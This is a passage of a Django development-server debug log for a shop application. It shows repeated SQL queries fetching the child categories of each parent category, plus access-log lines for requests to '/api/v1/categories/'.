"shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-10 12:47:08,960 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-10 12:47:08,964 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-10 12:47:08,968 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-10 12:47:08,972 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-10 12:47:08,976 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-10 12:47:08,981 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-10 12:47:08,985 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) [10/Dec/2019 12:47:08] "GET /api/v1/categories/ HTTP/1.0" 200 1619 [10/Dec/2019 12:47:18] "GET / HTTP/1.0" 302 0 [10/Dec/2019 12:52:21] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-10 12:55:12,908 utils 32196 139885071562496 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-10 12:55:12,913 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-10 12:55:12,915 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-10 12:55:12,917 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-10 12:55:12,920 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-10 12:55:12,922 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-10 12:55:12,924 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-10 12:55:12,926 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-10 12:55:12,929 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-10 12:55:12,931 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-10 12:55:12,933 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) [10/Dec/2019 12:55:12] "GET /api/v1/categories/ HTTP/1.0" 200 1619 DEBUG 2019-12-10 12:56:17,783 utils 32196 139885071562496 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-10 12:56:17,791 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-10 12:56:17,796 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-10 12:56:17,800 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-10 12:56:17,804 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-10 12:56:17,811 utils 32196 139885071562496 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-10 12:56:17,815 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-10 12:56:17,819 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-10 12:56:17,824 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-10 12:56:17,827 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-10 12:56:17,830 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) [10/Dec/2019 12:56:17] "GET /api/v1/categories/ HTTP/1.0" 200 1619 DEBUG 2019-12-10 12:56:22,360 utils 32196 139885071562496 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-10 12:56:22,368 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-10 12:56:22,371 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-10 12:56:22,373 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-10 12:56:22,376 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-10 12:56:22,378 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-10 12:56:22,381 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-10 12:56:22,383 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-10 12:56:22,387 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-10 12:56:22,390 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-10 12:56:22,393 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) [10/Dec/2019 12:56:22] "GET /api/v1/categories/ HTTP/1.0" 200 1619 DEBUG 2019-12-10 12:56:32,595 utils 32196 139885071562496 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-10 12:56:32,600 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-10 12:56:32,603 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-10 12:56:32,605 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-10 12:56:32,607 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-10 12:56:32,610 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-10 12:56:32,612 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-10 12:56:32,614 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-10 12:56:32,616 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-10 12:56:32,619 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-10 12:56:32,621 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) [10/Dec/2019 12:56:32] "GET /api/v1/categories/ HTTP/1.0" 200 1619 DEBUG 2019-12-10 12:57:06,195 utils 32196 139885071562496 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-10 12:57:06,202 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-10 12:57:06,206 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-10 12:57:06,209 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-10 12:57:06,212 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-10 12:57:06,215 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-10 12:57:06,219 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-10 12:57:06,221 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-10 12:57:06,224 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-10 12:57:06,227 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-10 12:57:06,229 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) [10/Dec/2019 12:57:06] "GET /api/v1/categories/ HTTP/1.0" 200 1619 DEBUG 2019-12-10 12:57:12,686 utils 32196 139885071562496 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-10 12:57:12,691 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-10 12:57:12,694 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-10 12:57:12,696 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-10 12:57:12,699 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-10 12:57:12,702 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-10 12:57:12,704 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-10 12:57:12,706 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", 